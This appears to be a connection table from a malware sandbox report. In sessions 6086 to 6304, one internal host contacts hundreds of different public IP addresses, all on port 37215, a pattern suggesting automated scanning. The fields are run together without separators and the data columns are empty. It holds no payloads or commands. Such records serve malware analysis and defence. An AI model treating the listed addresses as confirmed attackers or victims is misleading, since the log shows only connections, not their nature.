                                          6086192.168.2.2336856155.155.172.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6087192.168.2.2357060157.79.79.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6088192.168.2.235666841.102.14.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6089192.168.2.2335438197.182.91.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6090192.168.2.236016641.41.167.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6091192.168.2.2360838197.12.251.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6092192.168.2.234289041.85.255.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6093192.168.2.233361841.227.252.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6094192.168.2.2344058157.95.242.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6095192.168.2.2358680190.106.90.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6096192.168.2.2360764145.22.241.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6097192.168.2.2344800157.141.9.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6098192.168.2.234051641.54.148.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6099192.168.2.2339732212.158.32.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6100192.168.2.233543076.9.252.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6101192.168.2.234284441.162.57.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6102192.168.2.236031496.102.158.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6103192.168.2.233598641.196.139.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6104192.168.2.2345676157.32.161.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6105192.168.2.2351282132.160.198.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6106192.168.2.2333438197.4.19.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6107192.168.2.2352324157.192.246.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6108192.168.2.2340866157.243.64.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6109192.168.2.233857441.66.51.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6110192.168.2.2358678184.101.202.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6111192.168.2.2358410197.111.84.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6112192.168.2.235954241.80.53.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6113192.168.2.2342786197.69.194.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6114192.168.2.235457841.95.198.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6115192.168.2.2358318197.91.11.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6116192.168.2.2345854157.24.86.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6117192.168.2.2338006157.50.40.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6118192.168.2.235883843.94.109.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6119192.168.2.235082075.84.227.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6120192.168.2.236090241.201.39.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6121192.168.2.235847874.233.72.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6122192.168.2.2358296197.188.29.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6123192.168.2.235917441.162.82.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6124192.168.2.235042041.31.122.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6125192.168.2.2350930197.183.64.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6126192.168.2.2339982197.196.219.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6127192.168.2.2340876197.8.142.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6128192.168.2.2333594157.237.105.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6129192.168.2.2355410157.146.98.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6130192.168.2.234120861.66.65.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6131192.168.2.235878641.71.243.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6132192.168.2.2333216129.192.179.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6133192.168.2.23348069.254.36.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6134192.168.2.233774017.250.31.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6135192.168.2.235706024.16.64.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6136192.168.2.235480441.203.202.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6137192.168.2.2354488197.103.216.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6138192.168.2.233352225.79.18.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6139192.168.2.234501641.199.143.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6140192.168.2.234338441.204.91.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6141192.168.2.2350100197.150.212.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6142192.168.2.2345666137.33.27.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6143192.168.2.2357984192.10.188.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6144192.168.2.234203841.222.171.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6145192.168.2.234674641.106.45.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6146192.168.2.2341380197.32.205.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6147192.168.2.2351176197.152.83.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6148192.168.2.2345528157.34.107.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6149192.168.2.2349772198.84.203.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6150192.168.2.2352498157.26.126.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6151192.168.2.233372688.244.135.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6152192.168.2.233607241.156.76.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6153192.168.2.233409290.56.96.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6154192.168.2.2342824157.232.124.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6155192.168.2.2346552213.65.2.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6156192.168.2.2346338157.190.212.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6157192.168.2.235004641.146.97.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6158192.168.2.2334044157.43.210.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6159192.168.2.2351130157.108.22.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6160192.168.2.2341068157.234.29.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6161192.168.2.23561705.21.34.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6162192.168.2.233509041.62.231.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6163192.168.2.2343910197.49.189.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6164192.168.2.235587638.152.46.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6165192.168.2.2333954192.80.160.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6166192.168.2.2355498157.61.192.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6167192.168.2.2360904157.126.23.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6168192.168.2.235195041.64.139.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6169192.168.2.235624666.124.49.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6170192.168.2.233950841.181.197.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6171192.168.2.2353788197.97.42.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6172192.168.2.2358490157.234.222.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6173192.168.2.234984841.46.26.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6174192.168.2.2348306197.90.67.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6175192.168.2.2356702157.19.199.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6176192.168.2.2347660197.210.192.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6177192.168.2.2350436157.164.82.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6178192.168.2.2333864197.233.27.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6179192.168.2.2360884157.86.119.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6180192.168.2.234221441.201.116.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6181192.168.2.2359184197.212.165.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6182192.168.2.235794041.40.179.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6183192.168.2.2344954157.150.98.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6184192.168.2.2354088197.241.201.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6185192.168.2.2346202157.209.126.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6186192.168.2.233900643.207.49.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6187192.168.2.2341054197.143.134.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6188192.168.2.2352616157.150.246.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6189192.168.2.2342358197.75.74.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6190192.168.2.2343042197.154.122.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6191192.168.2.2355530118.239.107.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192192.168.2.2358930157.112.144.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6193192.168.2.236078295.27.76.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6194192.168.2.235953241.58.64.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6195192.168.2.2360654157.107.242.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6196192.168.2.2344306157.91.30.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6197192.168.2.2355752148.207.72.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6198192.168.2.234324441.47.195.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6199192.168.2.235061641.230.105.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6200192.168.2.2349644197.197.87.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6201192.168.2.236063841.76.95.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6202192.168.2.2353136157.204.215.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6203192.168.2.2340942166.231.82.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6204192.168.2.2352708157.184.100.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6205192.168.2.2348658157.242.129.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6206192.168.2.2352214157.45.70.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6207192.168.2.2360586197.27.168.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6208192.168.2.2344640197.143.138.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6209192.168.2.235578641.145.194.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6210192.168.2.233836870.23.25.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6211192.168.2.2336066197.126.8.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6212192.168.2.233438441.202.40.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6213192.168.2.2352682157.234.39.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6214192.168.2.2359350157.55.195.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6215192.168.2.2356388157.46.10.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6216192.168.2.2336534157.31.155.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6217192.168.2.2360726157.86.179.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6218192.168.2.2344464203.157.165.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6219192.168.2.2338078197.232.35.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6220192.168.2.233316841.3.29.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6221192.168.2.2350804197.222.120.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6222192.168.2.2351398188.251.225.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6223192.168.2.2338666175.248.119.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6224192.168.2.234761090.19.60.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6225192.168.2.234279641.75.213.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6226192.168.2.233882041.46.238.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6227192.168.2.2355560157.27.218.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6228192.168.2.2345892157.226.252.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6229192.168.2.2357550157.221.19.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6230192.168.2.2342758166.245.50.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6231192.168.2.2342330197.147.158.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6232192.168.2.236090478.66.85.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6233192.168.2.2357366197.70.45.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6234192.168.2.233860441.48.80.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6235192.168.2.2346362157.207.181.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6236192.168.2.2335656157.171.186.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6237192.168.2.2334284204.165.126.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6238192.168.2.235618241.224.77.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6239192.168.2.2358642197.141.164.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6240192.168.2.2332828157.39.2.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6241192.168.2.2335262197.224.240.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6242192.168.2.234464841.158.1.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6243192.168.2.2338178147.72.121.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6244192.168.2.233654641.51.164.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6245192.168.2.233405241.62.132.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6246192.168.2.233560432.189.204.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6247192.168.2.2352316199.24.235.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6248192.168.2.2344918157.65.194.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6249192.168.2.2334932197.38.50.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6250192.168.2.2353432212.63.66.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6251192.168.2.234626250.110.103.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6252192.168.2.233972641.19.94.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6253192.168.2.235779870.112.144.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6254192.168.2.234405641.67.120.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6255192.168.2.2334648139.196.145.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6256192.168.2.2335448157.164.35.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6257192.168.2.2344198157.71.125.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6258192.168.2.2352824157.218.215.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6259192.168.2.2334822121.224.197.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6260192.168.2.2350792157.93.161.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6261192.168.2.2342068157.21.212.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6262192.168.2.2345412157.119.217.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6263192.168.2.2355042157.238.101.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6264192.168.2.2358068197.231.235.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6265192.168.2.2346322197.89.84.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6266192.168.2.234067241.30.105.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6267192.168.2.2347074197.135.23.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6268192.168.2.236010241.217.63.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6269192.168.2.2343304157.136.226.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6270192.168.2.235407441.248.103.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6271192.168.2.2346910112.223.184.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6272192.168.2.2351194157.160.48.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6273192.168.2.2359508135.240.228.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6274192.168.2.233869641.123.173.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6275192.168.2.2339802157.13.6.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6276192.168.2.2341232197.201.148.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6277192.168.2.233439641.11.54.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6278192.168.2.2354772197.133.128.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6279192.168.2.2333342197.199.57.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6280192.168.2.2349828157.96.21.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6281192.168.2.234680441.9.243.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6282192.168.2.2350698157.157.223.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6283192.168.2.2340928216.65.151.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6284192.168.2.2341868197.5.131.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6285192.168.2.2353750197.133.79.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6286192.168.2.2337472157.132.33.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6287192.168.2.2350524100.127.169.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6288192.168.2.2357458197.99.40.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6289192.168.2.235478659.17.46.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6290192.168.2.2346280197.161.253.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6291192.168.2.2337082197.159.54.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6292192.168.2.2339428157.144.39.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6293192.168.2.2336338129.72.190.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6294192.168.2.2356078197.112.223.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6295192.168.2.2349752197.37.221.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6296192.168.2.2334726197.120.58.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6297192.168.2.233973441.69.0.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6298192.168.2.236010841.118.58.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6299192.168.2.233651023.209.216.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6300192.168.2.2345804157.80.108.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6301192.168.2.233808474.74.184.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6302192.168.2.235106041.156.82.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6303192.168.2.233986241.223.88.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6304192.168.2.2348024197.250.152.24537215
                                          TimestampBytes transferredDirectionData


